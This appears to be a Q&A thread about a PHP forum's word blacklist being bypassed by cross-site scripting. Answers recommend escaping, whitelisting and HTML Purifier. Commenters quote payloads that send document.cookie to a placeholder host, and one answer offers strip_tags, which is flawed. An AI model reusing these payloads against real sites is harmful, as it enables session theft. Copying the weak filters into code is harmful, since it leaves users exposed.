# people are hacking my filter

Tags: php, xss

i am using regex and blocking out the words document|window|alert|onmouseover|onclick to prevent xss, and people seem to be able to bypassing it by just typing doc\ument, how do i fix this ?

thanks!

--

edit: what about preventing xss server side? maybe refuse to serve any file that contains stuff in a GET variable?

Comment: Bearing in mind the level of information you've supplied us with, I'd say the only way to stop it would be to power down your web server.

Comment: FYI, for an idea of how many other ways there are around such a simple blocking scheme: http://ha.ckers.org/xss.html

Answer (score 4, accepted):

Obviously, you would have to supply some meaningful detail to get any serious answer for your problem at hand.

As @David Dorward notes, the most easy option is to escape all HTML entities. That disables all HTML, but you don't have to deal with the plight of fighting XSS attacks.

If you need to suppot HTML, consider using a pre-made Anti-XSS filter like [HTML purifier](http://htmlpurifier.org/) that promises to reliably block such attempts.

> HTML Purifier is a standards-compliant HTML filter library written in PHP. HTML Purifier will not only remove all malicious code (better known as XSS) with a thoroughly audited, secure yet permissive whitelist, it will also make sure your documents are standards compliant, something only achievable with a comprehensive knowledge of W3C's specifications.

Comment: thanks for this so i sohuld be using whitelist instead of blacklist?

Comment: should i sanitize input or just allow escaped raw data into the database and sanitize output?

Comment: @jae doing a `htmlentities()` on the data is surely the most easy way.

Comment: i recently found this does html purifier fix this http://utf-8.jp/public/aaencode.html

Comment: escape data on input, sanitize on output.

Answer (score 1):

The simple option is to disallow any HTML and the convert all `&`, `<` and `>` to their respective entities (`&amp;`, `&lt;` and `&gt;`).

The more complicated approach is to run the input through an HTML parser, apply a whitelist to element and attribute names, then serialise it back to HTML.

Answer (score 0):

Is this system at all important/critical?

**If so, turn it off immediately and hire a security consultant to secure it for you.**

Security is a *hard* problem. Don't think you can get it right first time, because you won't.

If this is just a system you play around with?

Trying to stop XSS by filtering particular words is a losing battle. If you don't want HTML insertion, just HTML-encode *everything*. If you do want some HTML, then you need to *parse* the HTML, make sure it's *valid* and isn't going to break the page, and only then make sure it doesn't contain any elements or attributes that you don't want.

Comment: what would be best practice for allowing bbcode? this is not important/critical but its forum im making

Comment: @jae: Don't reinvent the wheel. Escape *all* HTML, and then use an established BBCode library to handle that stuff. Or better yet, use some already-established message board software.

Answer (score 0):

I had the same problem and only asked the question yesterday. Personally rather than deleteing tags I created a list of all the tags I did want. Using the PHP command strip_tags is what I use now.

strip_tags ( string $str [, string $allowable_tags ] )

Using this command you can simply apply it to your filter like this.

text entered:

`<b>Hi</b><malicious tag>`

`strip_tags("<b>Hi</b><malicious tag>","<b>")`

This would output `<b>Hi</b>`.

Comment: what would that do about `<b onmouseover="window.location='http://example.com/?q='+document.cookie;">`

Comment: **This alone is not a safe measure to fight XSS.** See e.g. http://stackoverflow.com/questions/3605629/php-prevent-xss-with-strip-tags

Comment: I just realised an even better malicious script. <b onpageload="window.location='http://example.com/?q='+document.cookie;">